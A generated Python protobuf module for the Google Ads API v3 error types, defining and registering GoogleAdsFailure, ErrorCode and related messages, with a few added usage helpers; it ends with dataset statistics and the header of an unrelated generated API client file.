_ERRORCODE.fields_by_name['not_empty_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['null_error'])
_ERRORCODE.fields_by_name['null_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['operator_error'])
_ERRORCODE.fields_by_name['operator_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['range_error'])
_ERRORCODE.fields_by_name['range_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['recommendation_error'])
_ERRORCODE.fields_by_name['recommendation_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['region_code_error'])
_ERRORCODE.fields_by_name['region_code_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['setting_error'])
_ERRORCODE.fields_by_name['setting_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['string_format_error'])
_ERRORCODE.fields_by_name['string_format_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['string_length_error'])
_ERRORCODE.fields_by_name['string_length_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['operation_access_denied_error'])
_ERRORCODE.fields_by_name['operation_access_denied_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['resource_access_denied_error'])
_ERRORCODE.fields_by_name['resource_access_denied_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['resource_count_limit_exceeded_error'])
_ERRORCODE.fields_by_name['resource_count_limit_exceeded_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['youtube_video_registration_error'])
_ERRORCODE.fields_by_name['youtube_video_registration_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['ad_group_bid_modifier_error'])
_ERRORCODE.fields_by_name['ad_group_bid_modifier_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['context_error'])
_ERRORCODE.fields_by_name['context_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['field_error'])
_ERRORCODE.fields_by_name['field_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['shared_set_error'])
_ERRORCODE.fields_by_name['shared_set_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['shared_criterion_error'])
_ERRORCODE.fields_by_name['shared_criterion_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['campaign_shared_set_error'])
_ERRORCODE.fields_by_name['campaign_shared_set_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['conversion_action_error'])
_ERRORCODE.fields_by_name['conversion_action_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['conversion_adjustment_upload_error'])
_ERRORCODE.fields_by_name['conversion_adjustment_upload_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['conversion_upload_error'])
_ERRORCODE.fields_by_name['conversion_upload_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['header_error'])
_ERRORCODE.fields_by_name['header_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['database_error'])
_ERRORCODE.fields_by_name['database_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['policy_finding_error'])
_ERRORCODE.fields_by_name['policy_finding_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['enum_error'])
_ERRORCODE.fields_by_name['enum_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['keyword_plan_error'])
_ERRORCODE.fields_by_name['keyword_plan_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['keyword_plan_campaign_error'])
_ERRORCODE.fields_by_name['keyword_plan_campaign_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['keyword_plan_negative_keyword_error'])
_ERRORCODE.fields_by_name['keyword_plan_negative_keyword_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['keyword_plan_ad_group_error'])
_ERRORCODE.fields_by_name['keyword_plan_ad_group_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['keyword_plan_keyword_error'])
_ERRORCODE.fields_by_name['keyword_plan_keyword_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['keyword_plan_idea_error'])
_ERRORCODE.fields_by_name['keyword_plan_idea_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['account_budget_proposal_error'])
_ERRORCODE.fields_by_name['account_budget_proposal_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['user_list_error'])
_ERRORCODE.fields_by_name['user_list_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['change_status_error'])
_ERRORCODE.fields_by_name['change_status_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['feed_error'])
_ERRORCODE.fields_by_name['feed_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['geo_target_constant_suggestion_error'])
_ERRORCODE.fields_by_name['geo_target_constant_suggestion_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['campaign_draft_error'])
_ERRORCODE.fields_by_name['campaign_draft_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['feed_item_error'])
_ERRORCODE.fields_by_name['feed_item_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['label_error'])
_ERRORCODE.fields_by_name['label_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['billing_setup_error'])
_ERRORCODE.fields_by_name['billing_setup_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['customer_client_link_error'])
_ERRORCODE.fields_by_name['customer_client_link_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['customer_manager_link_error'])
_ERRORCODE.fields_by_name['customer_manager_link_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['feed_mapping_error'])
_ERRORCODE.fields_by_name['feed_mapping_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['customer_feed_error'])
_ERRORCODE.fields_by_name['customer_feed_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['ad_group_feed_error'])
_ERRORCODE.fields_by_name['ad_group_feed_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['campaign_feed_error'])
_ERRORCODE.fields_by_name['campaign_feed_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['custom_interest_error'])
_ERRORCODE.fields_by_name['custom_interest_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['campaign_experiment_error'])
_ERRORCODE.fields_by_name['campaign_experiment_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['extension_feed_item_error'])
_ERRORCODE.fields_by_name['extension_feed_item_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['ad_parameter_error'])
_ERRORCODE.fields_by_name['ad_parameter_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['feed_item_validation_error'])
_ERRORCODE.fields_by_name['feed_item_validation_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['extension_setting_error'])
_ERRORCODE.fields_by_name['extension_setting_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['feed_item_target_error'])
_ERRORCODE.fields_by_name['feed_item_target_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['policy_violation_error'])
_ERRORCODE.fields_by_name['policy_violation_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['mutate_job_error'])
_ERRORCODE.fields_by_name['mutate_job_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['partial_failure_error'])
_ERRORCODE.fields_by_name['partial_failure_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['policy_validation_parameter_error'])
_ERRORCODE.fields_by_name['policy_validation_parameter_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['size_limit_error'])
_ERRORCODE.fields_by_name['size_limit_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['offline_user_data_job_error'])
_ERRORCODE.fields_by_name['offline_user_data_job_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['not_whitelisted_error'])
_ERRORCODE.fields_by_name['not_whitelisted_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['manager_link_error'])
_ERRORCODE.fields_by_name['manager_link_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['currency_code_error'])
_ERRORCODE.fields_by_name['currency_code_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['access_invitation_error'])
_ERRORCODE.fields_by_name['access_invitation_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['reach_plan_error'])
_ERRORCODE.fields_by_name['reach_plan_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['invoice_error'])
_ERRORCODE.fields_by_name['invoice_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['payments_account_error'])
_ERRORCODE.fields_by_name['payments_account_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['time_zone_error'])
_ERRORCODE.fields_by_name['time_zone_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['asset_link_error'])
_ERRORCODE.fields_by_name['asset_link_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['user_data_error'])
_ERRORCODE.fields_by_name['user_data_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
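# --- Hedged usage sketch (editorial addition, not emitted by protoc) ---
# The wiring above places every ErrorCode field inside the 'error_code'
# oneof, so at most one of them can be set on a message. WhichOneof is the
# standard protobuf API for asking which one; `error_code_msg` is an
# assumed ErrorCode instance (the class itself is registered further down
# in this file, so the name lookup only happens at call time).
def _which_error(error_code_msg):
  """Return (field_name, enum_value) for the populated error, or None."""
  which = error_code_msg.WhichOneof('error_code')
  if which is None:
    return None
  return which, getattr(error_code_msg, which)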
_ERRORLOCATION_FIELDPATHELEMENT.fields_by_name['index'].message_type = google_dot_protobuf_dot_wrappers__pb2._INT64VALUE
_ERRORLOCATION_FIELDPATHELEMENT.containing_type = _ERRORLOCATION
_ERRORLOCATION.fields_by_name['field_path_elements'].message_type = _ERRORLOCATION_FIELDPATHELEMENT
_ERRORDETAILS.fields_by_name['policy_violation_details'].message_type = _POLICYVIOLATIONDETAILS
_ERRORDETAILS.fields_by_name['policy_finding_details'].message_type = _POLICYFINDINGDETAILS
_POLICYVIOLATIONDETAILS.fields_by_name['key'].message_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_common_dot_policy__pb2._POLICYVIOLATIONKEY
_POLICYFINDINGDETAILS.fields_by_name['policy_topic_entries'].message_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_common_dot_policy__pb2._POLICYTOPICENTRY
DESCRIPTOR.message_types_by_name['GoogleAdsFailure'] = _GOOGLEADSFAILURE
DESCRIPTOR.message_types_by_name['GoogleAdsError'] = _GOOGLEADSERROR
DESCRIPTOR.message_types_by_name['ErrorCode'] = _ERRORCODE
DESCRIPTOR.message_types_by_name['ErrorLocation'] = _ERRORLOCATION
DESCRIPTOR.message_types_by_name['ErrorDetails'] = _ERRORDETAILS
DESCRIPTOR.message_types_by_name['PolicyViolationDetails'] = _POLICYVIOLATIONDETAILS
DESCRIPTOR.message_types_by_name['PolicyFindingDetails'] = _POLICYFINDINGDETAILS
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
GoogleAdsFailure = _reflection.GeneratedProtocolMessageType('GoogleAdsFailure', (_message.Message,), dict(
DESCRIPTOR = _GOOGLEADSFAILURE,
__module__ = 'google.ads.googleads_v3.proto.errors.errors_pb2'
,
__doc__ = """Describes how a GoogleAds API call failed. It's returned inside
google.rpc.Status.details when a call fails.
Attributes:
errors:
The list of errors that occurred.
""",
# @@protoc_insertion_point(class_scope:google.ads.googleads.v3.errors.GoogleAdsFailure)
))
_sym_db.RegisterMessage(GoogleAdsFailure)
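# --- Hedged usage sketch (editorial addition, not emitted by protoc) ---
# Per the docstring above, GoogleAdsFailure travels packed inside
# google.rpc.Status.details, so it can be recovered with the standard
# Any.Is/Unpack protobuf APIs. The `status` argument is an assumed
# google.rpc.status_pb2.Status taken from the failed call's trailers.
def _extract_google_ads_failures(status):
  """Return every GoogleAdsFailure packed into a google.rpc.Status."""
  failures = []
  for detail in status.details:  # each entry is a google.protobuf.Any
    if detail.Is(GoogleAdsFailure.DESCRIPTOR):
      failure = GoogleAdsFailure()
      detail.Unpack(failure)
      failures.append(failure)
  return failures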
GoogleAdsError = _reflection.GeneratedProtocolMessageType('GoogleAdsError', (_message.Message,), dict(
DESCRIPTOR = _GOOGLEADSERROR,
__module__ = 'google.ads.googleads_v3.proto.errors.errors_pb2'
,
__doc__ = """GoogleAds-specific error.
Attributes:
error_code:
An enum value that indicates which error occurred.
message:
A human-readable description of the error.
trigger:
The value that triggered the error.
location:
Describes the part of the request proto that caused the error.
details:
Additional error details, which are returned by certain error
codes. Most error codes do not include details.
""",
# @@protoc_insertion_point(class_scope:google.ads.googleads.v3.errors.GoogleAdsError)
))
_sym_db.RegisterMessage(GoogleAdsError)
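# --- Hedged usage sketch (editorial addition, not emitted by protoc) ---
# A GoogleAdsError pinpoints the offending request field through
# location.field_path_elements; a dotted path such as
# "operations[0].create" can be rebuilt from those elements. `err` is an
# assumed GoogleAdsError instance.
def _format_error_location(err):
  """Render err.location.field_path_elements as a dotted field path."""
  parts = []
  for element in err.location.field_path_elements:
    name = element.field_name
    if element.HasField('index'):  # index is a google.protobuf.Int64Value
      name += '[%d]' % element.index.value
    parts.append(name)
  return '.'.join(parts)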
ErrorCode = _reflection.GeneratedProtocolMessageType('ErrorCode', (_message.Message,), dict(
DESCRIPTOR = _ERRORCODE,
__module__ = 'google.ads.googleads_v3.proto.errors.errors_pb2'
,
__doc__ = """The error reason represented by type and enum.
Attributes:
error_code:
The list of error enums
request_error:
An error caused by the request
bidding_strategy_error:
An error with a Bidding Strategy mutate.
url_field_error:
An error with a URL field mutate.
list_operation_error:
An error with a list operation.
query_error:
An error with an AWQL query
mutate_error:
An error with a mutate
field_mask_error:
An error with a field mask
authorization_error:
An error encountered when trying to authorize a user.
internal_error:
An unexpected server-side error.
quota_error:
An error with the amount of quota remaining.
ad_error:
An error with an Ad Group Ad mutate.
ad_group_error:
An error with an Ad Group mutate.
campaign_budget_error:
An error with a Campaign Budget mutate.
campaign_error:
An error with a Campaign mutate.
authentication_error:
Indicates failure to properly authenticate user.
ad_group_criterion_error:
The reasons for the ad group criterion error.
ad_customizer_error:
The reasons for the ad customizer error
ad_group_ad_error:
The reasons for the ad group ad error
ad_sharing_error:
The reasons for the ad sharing error
adx_error:
The reasons for the adx error
asset_error:
The reasons for the asset error
bidding_error:
The reasons for the bidding errors
campaign_criterion_error:
The reasons for the campaign criterion error
collection_size_error:
The reasons for the collection size error
country_code_error:
The reasons for the country code error
criterion_error:
The reasons for the criterion error
customer_error:
The reasons for the customer error
date_error:
The reasons for the date error
date_range_error:
The reasons for the date range error
distinct_error:
The reasons for the distinct error
feed_attribute_reference_error:
The reasons for the feed attribute reference error
function_error:
The reasons for the function error
function_parsing_error:
The reasons for the function parsing error
id_error:
The reasons for the id error
image_error:
The reasons for the image error
language_code_error:
The reasons for the language code error
media_bundle_error:
The reasons for the media bundle error
media_upload_error:
The reasons for media uploading errors.
media_file_error:
The reasons for the media file error
multiplier_error:
The reasons for the multiplier error
new_resource_creation_error:
The reasons for the new resource creation error
not_empty_error:
The reasons for the not empty error
null_error:
The reasons for the null error
operator_error:
The reasons for the operator error
range_error:
The reasons for the range error
recommendation_error:
The reasons for error in applying a recommendation
region_code_error:
The reasons for the region code error
setting_error:
The reasons for the setting error
string_format_error:
The reasons for the string format error
string_length_error:
The reasons for the string length error
operation_access_denied_error:
The reasons for the operation access denied error
resource_access_denied_error:
The reasons for the resource access denied error
resource_count_limit_exceeded_error:
The reasons for the resource count limit exceeded error
youtube_video_registration_error:
The reasons for YouTube video registration errors.
ad_group_bid_modifier_error:
The reasons for the ad group bid modifier error
context_error:
The reasons for the context error
field_error:
The reasons for the field error
shared_set_error:
The reasons for the shared set error
shared_criterion_error:
The reasons for the shared criterion error
campaign_shared_set_error:
The reasons for the campaign shared set error
conversion_action_error:
The reasons for the conversion action error
conversion_adjustment_upload_error:
The reasons for the conversion adjustment upload error
conversion_upload_error:
The reasons for the conversion upload error
header_error:
The reasons for the header error.
database_error:
The reasons for the database error.
policy_finding_error:
The reasons for the policy finding error.
enum_error:
The reason for enum error.
keyword_plan_error:
The reason for keyword plan error.
keyword_plan_campaign_error:
The reason for keyword plan campaign error.
keyword_plan_negative_keyword_error:
The reason for keyword plan negative keyword error.
keyword_plan_ad_group_error:
The reason for keyword plan ad group error.
keyword_plan_keyword_error:
The reason for keyword plan keyword error.
keyword_plan_idea_error:
The reason for keyword idea error.
account_budget_proposal_error:
The reasons for account budget proposal errors.
user_list_error:
The reasons for the user list error
change_status_error:
The reasons for the change status error
feed_error:
The reasons for the feed error
geo_target_constant_suggestion_error:
The reasons for the geo target constant suggestion error.
campaign_draft_error:
The reasons for the campaign draft error
feed_item_error:
The reasons for the feed item error
label_error:
The reason for the label error.
billing_setup_error:
The reasons for the billing setup error
customer_client_link_error:
The reasons for the customer client link error
customer_manager_link_error:
The reasons for the customer manager link error
feed_mapping_error:
The reasons for the feed mapping error
customer_feed_error:
The reasons for the customer feed error
ad_group_feed_error:
The reasons for the ad group feed error
campaign_feed_error:
The reasons for the campaign feed error
custom_interest_error:
The reasons for the custom interest error
campaign_experiment_error:
The reasons for the campaign experiment error
extension_feed_item_error:
The reasons for the extension feed item error
ad_parameter_error:
The reasons for the ad parameter error
feed_item_validation_error:
The reasons for the feed item validation error
extension_setting_error:
The reasons for the extension setting error
feed_item_target_error:
The reasons for the feed item target error
policy_violation_error:
The reasons for the policy violation error
mutate_job_error:
The reasons for the mutate job error
partial_failure_error:
The reasons for the partial failure error
policy_validation_parameter_error:
The reasons for the policy validation parameter error
size_limit_error:
The reasons for the size limit error
offline_user_data_job_error:
The reasons for the offline user data job error.
not_whitelisted_error:
The reasons for the not whitelisted error
manager_link_error:
The reasons for the manager link error
currency_code_error:
The reasons for the currency code error
access_invitation_error:
The reasons for the access invitation error
reach_plan_error:
The reasons for the reach plan error
invoice_error:
The reasons for the invoice error
payments_account_error:
The reasons for errors in payments accounts service
time_zone_error:
The reasons for the time zone error
asset_link_error:
The reasons for the asset link error
user_data_error:
The reasons for the user data error.
""",
# @@protoc_insertion_point(class_scope:google.ads.googleads.v3.errors.ErrorCode)
))
_sym_db.RegisterMessage(ErrorCode)
ErrorLocation = _reflection.GeneratedProtocolMessageType('ErrorLocation', (_message.Message,), dict(
FieldPathElement = _reflection.GeneratedProtocolMessageType('FieldPathElement', (_message.Message,), dict(
DESCRIPTOR = _ERRORLOCATION_FIELDPATHELEMENT,
__module__ = 'google.ads.googleads_v3.proto.errors.errors_pb2'
,
__doc__ = """A part of a field path.
Attributes:
field_name:
The name of a field or a oneof
index:
If field\_name is a repeated field, this is the element that
failed
""",
# @@protoc_insertion_point(class_scope:google.ads.googleads.v3.errors.ErrorLocation.FieldPathElement)
))
,
DESCRIPTOR = _ERRORLOCATION,
__module__ = 'google.ads.googleads_v3.proto.errors.errors_pb2'
,
__doc__ = """Describes the part of the request proto that caused the error.
Attributes:
field_path_elements:
A field path that indicates which field was invalid in the
request.
""",
# @@protoc_insertion_point(class_scope:google.ads.googleads.v3.errors.ErrorLocation)
))
_sym_db.RegisterMessage(ErrorLocation)
_sym_db.RegisterMessage(ErrorLocation.FieldPathElement)
ErrorDetails = _reflection.GeneratedProtocolMessageType('ErrorDetails', (_message.Message,), dict(
DESCRIPTOR = _ERRORDETAILS,
__module__ = 'google.ads.googleads_v3.proto.errors.errors_pb2'
,
__doc__ = """Additional error details.
Attributes:
unpublished_error_code:
The error code that should have been returned, but wasn't.
This is used when the error code is
InternalError.ERROR\_CODE\_NOT\_PUBLISHED.
policy_violation_details:
Describes an ad policy violation.
policy_finding_details:
Describes policy violation findings.
""",
# @@protoc_insertion_point(class_scope:google.ads.googleads.v3.errors.ErrorDetails)
))
_sym_db.RegisterMessage(ErrorDetails)
PolicyViolationDetails = _reflection.GeneratedProtocolMessageType('PolicyViolationDetails', (_message.Message,), dict(
DESCRIPTOR = _POLICYVIOLATIONDETAILS,
__module__ = 'google.ads.googleads_v3.proto.errors.errors_pb2'
,
__doc__ = """Error returned as part of a mutate response. This error indicates single
policy violation by some text in one of the fields.
Attributes:
external_policy_description:
Human-readable description of the policy violation.
key:
Unique identifier for this violation. If the policy is
exemptible, this key may be used to request an exemption.
external_policy_name:
Human-readable name of the policy.
is_exemptible:
Whether the user can file an exemption request for this violation.
""",
# @@protoc_insertion_point(class_scope:google.ads.googleads.v3.errors.PolicyViolationDetails)
))
_sym_db.RegisterMessage(PolicyViolationDetails)
PolicyFindingDetails = _reflection.GeneratedProtocolMessageType('PolicyFindingDetails', (_message.Message,), dict(
DESCRIPTOR = _POLICYFINDINGDETAILS,
__module__ = 'google.ads.googleads_v3.proto.errors.errors_pb2'
,
__doc__ = """Error returned as part of a mutate response. This error indicates one or
more policy findings in the fields of a resource.
Attributes:
policy_topic_entries:
The list of policy topics for the resource. Contains the
PROHIBITED or FULLY\_LIMITED policy topic entries that
prevented the resource from being saved (among any other
entries the resource may also have).
""",
# @@protoc_insertion_point(class_scope:google.ads.googleads.v3.errors.PolicyFindingDetails)
))
_sym_db.RegisterMessage(PolicyFindingDetails)
DESCRIPTOR._options = None
# @@protoc_insertion_point(module_scope)
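# Usage sketch: once this module is imported, the registered classes behave
# like ordinary protobuf messages, so the large 'error_code' oneof can be
# inspected with WhichOneof(). The message text and enum value below are
# illustrative assumptions, not values returned by the API.
#
#   failure = GoogleAdsFailure()
#   error = failure.errors.add()
#   error.message = 'Resource quota exhausted.'
#   error.error_code.quota_error = 2  # assumed QuotaError enum value
#   assert error.error_code.WhichOneof('error_code') == 'quota_error'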
| 82.349543
| 24,384
| 0.832045
| 24,438
| 171,040
| 5.301211
| 0.043784
| 0.063002
| 0.043442
| 0.039367
| 0.807188
| 0.785289
| 0.751843
| 0.714699
| 0.674182
| 0.623886
| 0
| 0.031037
| 0.079783
| 171,040
| 2,076
| 24,385
| 82.38921
| 0.792063
| 0.005291
| 0
| 0.461997
| 1
| 0.066567
| 0.302097
| 0.202379
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.059613
| 0
| 0.059613
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
c764846d2d2ac5223bc2f83a18fa911e797677da
| 43,546
|
py
|
Python
|
layint_runtime_api/apis/image_api.py
|
LayeredInsight/layint_runtime_api_python
|
0e24f2cc5bf342505d6ec9af19323819b1a70d4d
|
[
"Apache-2.0"
] | 1
|
2018-03-26T23:54:59.000Z
|
2018-03-26T23:54:59.000Z
|
layint_runtime_api/apis/image_api.py
|
LayeredInsight/layint_runtime_api_python
|
0e24f2cc5bf342505d6ec9af19323819b1a70d4d
|
[
"Apache-2.0"
] | null | null | null |
layint_runtime_api/apis/image_api.py
|
LayeredInsight/layint_runtime_api_python
|
0e24f2cc5bf342505d6ec9af19323819b1a70d4d
|
[
"Apache-2.0"
] | null | null | null |
# coding: utf-8
"""
Layered Witness & Control
LI Witness provides deep insight and analytics into containerized applications. Control provides dynamic runtime security and analytics for containerized applications. You can find out more about the Layered Insight Suite at [http://layeredinsight.com](http://layeredinsight.com).
OpenAPI spec version: 0.9.7
Contact: help@layeredinsight.com
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
